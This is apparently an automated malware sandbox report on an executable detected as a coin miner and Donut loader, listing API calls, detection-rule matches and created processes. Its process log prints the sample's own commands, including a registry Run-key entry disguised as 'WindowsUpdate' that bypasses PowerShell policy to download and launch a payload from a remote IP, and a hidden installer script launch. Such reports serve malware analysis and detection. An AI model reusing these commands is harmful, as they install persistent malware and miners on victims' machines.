        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400071A0 GlobalAlloc,GlobalLock,GlobalFree,EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400075B0 GetClipboardFormatNameW,GetClipboardData
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140030A50 GetSystemMetrics,GetSystemMetrics,GetDC,GetLastError,DestroyIcon,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,GetDC,CreateCompatibleDC,GetIconInfo,GetObjectW,CreateCompatibleBitmap,SelectObject,CreateSolidBrush,FillRect,DeleteObject,DrawIconEx,SelectObject,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,DestroyIcon,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetLastError,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400225F0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount

        System Summary

        Source: dump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
        Source: 00000017.00000002.1681510844.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000017.00000002.1682248849.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000017.00000000.1514869654.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 00000017.00000000.1514246330.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Window found: window name: AutoHotkey
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Window found: window name: AutoHotkey
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140026A7C: GetDriveTypeW,CreateFileW,DeviceIoControl,CloseHandle
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140063EB0 GetFileAttributesW,CreateProcessWithLogonW,GetLastError,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,CloseHandle,GetLastError,FormatMessageW
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004810C
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400462C0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000172D
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004780C
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140076850
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400058B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140034FE8
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140014020
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014002C050
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400D6054
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140037070
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004F07A
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014001E0A8
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140015100
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004C120
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004D140
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140035270
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400492D8
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400302F0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400CE3CC
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140012460
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400D64E8
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C650C
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014001F530
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140019530
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140039540
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400B2570
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000256E
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014008C580
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400A65B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014001B5C0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140052610
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000262E
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C6710
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140002728
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C875C
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140034790
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400567D0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000F7E0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400507F0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400D0810
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140036810
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140037840
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140027880
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140015898
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014002F8B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014001D8D0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400CE8D8
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C691C
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400D4930
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140053970
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014003F9B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400A09F0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140008A10
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400ACA30
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C7A48
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140030A50
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014001FA50
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C6B20
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C8B60
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400D6B68
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004FBA6
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140057BC0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140051C04
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400BCC20
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140016C20
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000AC30
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140041C80
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140015C90
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C6D2C
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014004ED50
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014003DD60
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140021D80
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400DADE4
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140002E25
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140029E30
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400DDE60
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140049E69
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140002E73
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_0000000140003EA3
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000BEB8
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014002DEF0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400C6F30
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014000FFA0
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_000000014002CFD0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F375E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F8F1E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F541A0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F3E8E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F458A0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F36880
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F33760
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F2A320
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F382E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F4CEC0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F5E6C0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F316BB
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F7C6A0
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F2DA80
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F73280
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F22220
        Source: C:\Windows\explorer.exe | Code function: 23_2_11F23E00
        Source: C:\Windows\explorer.exe | Code function: 23_2_583558A0
        Source: C:\Windows\explorer.exe | Code function: 23_2_58346880
        Source: C:\Windows\explorer.exe | Code function: 23_2_5834E8E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_583641A0
        Source: C:\Windows\explorer.exe | Code function: 23_2_583475E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_5839F1E0
        Source: C:\Windows\explorer.exe | Code function: 23_2_58332220
        Source: C:\Windows\explorer.exe | Code function: 23_2_58333E00
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: String function: 0000000140010320 appears 90 times
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: String function: 000000014000F310 appears 68 times
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: String function: 00000001400C53DC appears 120 times
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: String function: 000000014000EF70 appears 63 times
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7188 -s 7020
        Source: 1ZXaFij.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
        Source: runps.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 00000017.00000002.1681510844.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000017.00000002.1682248849.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000017.00000000.1514869654.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 00000017.00000000.1514246330.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: classification engineClassification label: mal100.troj.adwa.expl.evad.mine.winEXE@40/50@5/6
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140063EB0 GetFileAttributesW,CreateProcessWithLogonW,GetLastError,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,CloseHandle,GetLastError,FormatMessageW,2_2_0000000140063EB0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400270AC GetDiskFreeSpaceW,GetLastError,2_2_00000001400270AC
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400711A0 OpenProcess,GetProcessId,WaitForSingleObject,CloseHandle,GetLastError,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,CloseHandle,2_2_00000001400711A0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140034350 CoCreateInstance,CoTaskMemFree,CoTaskMemFree,2_2_0000000140034350
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004810C CharUpperW,CompareStringOrdinal,FindResourceW,LoadResource,LockResource,SizeofResource,GetCPInfo,FindResourceExW,2_2_000000014004810C
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6148
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2500
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlwxuz1k.bpq.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: 1ZXaFij.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: 1ZXaFij.exe | Virustotal: Detection: 55%
        Source: 1ZXaFij.exe | ReversingLabs: Detection: 42%
        Source: C:\Users\user\Desktop\1ZXaFij.exe | File read: C:\Users\user\Desktop\1ZXaFij.exe
        Source: unknown | Process created: C:\Users\user\Desktop\1ZXaFij.exe "C:\Users\user\Desktop\1ZXaFij.exe"
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP"
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7188 -s 7020
        Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6148 -s 8632
        Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2500 -s 7024
        Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"
